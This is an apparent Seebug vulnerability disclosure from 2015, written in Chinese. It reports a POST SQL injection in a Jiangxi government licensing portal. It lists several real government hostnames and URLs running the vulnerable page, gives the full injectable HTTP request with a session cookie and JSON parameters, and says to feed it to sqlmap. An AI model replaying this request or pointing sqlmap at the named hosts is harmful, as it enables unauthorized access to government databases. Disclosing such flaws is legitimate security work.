某政务系统一处POST注入漏洞

2015-03-04T00:00:00
ID SSV:95848
Type seebug
Reporter Root
Modified 2015-03-04T00:00:00

Description

简要描述:

RT

详细说明:

案例如下: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp http://117.40.187.175:8008/outportal/licenseManage/newLicenseManage.jsp http://wssp.jdz.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://xzfw.jinxi.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://wssp.lepingshi.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://xzfw.jxcr.gov.cn/outportal/licenseManage/newLicenseManage.jsp http://120.203.196.20/outportal/licenseManage/newLicenseManage.jsp 需要一个一个的抓包。。 1.测试案例:http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp

<img src="https://images.seebug.org/upload/201503/021548340041f90ff657f13f50092586ff51d97b.png" alt="7.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/02154846be96c4187365f16d3aa5fb964debad86.png" alt="8.png" width="600" onerror="javascript:errimg(this);">

POST参数: POST /outportal/command/ajax/com.ecgap.outinformationdocument.cmd.OutInformationDocumentCommand/getLicese HTTP/1.1 Host: wssp.jiangxi.gov.cn:8008 Proxy-Connection: keep-alive Content-Length: 91 Origin: http://wssp.jiangxi.gov.cn:8008 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36 Content-Type: application/json Accept: / Referer: http://wssp.jiangxi.gov.cn:8008/outportal/licenseManage/newLicenseManage.jsp Accept-Encoding: gzip,deflate,sdch Accept-Language: zh-CN,zh;q=0.8 Cookie: JSESSIONID=9E6BB805520597F8458E70206F8EF271 {"params":{"javaClass":"ParameterSet","map":{"acceptno":"1111","cerno":"1111"},"length":2}} 用sqlmap -r 去跑。。

<img src="https://images.seebug.org/upload/201503/021553305104c61cce41f73df23babce9ee628b4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/0215534880d275746dc39d36faf798203acc1f4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">

漏洞证明:

<img src="https://images.seebug.org/upload/201503/021553305104c61cce41f73df23babce9ee628b4.png" alt="1.png" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201503/0215534880d275746dc39d36faf798203acc1f4b.png" alt="2.png" width="600" onerror="javascript:errimg(this);">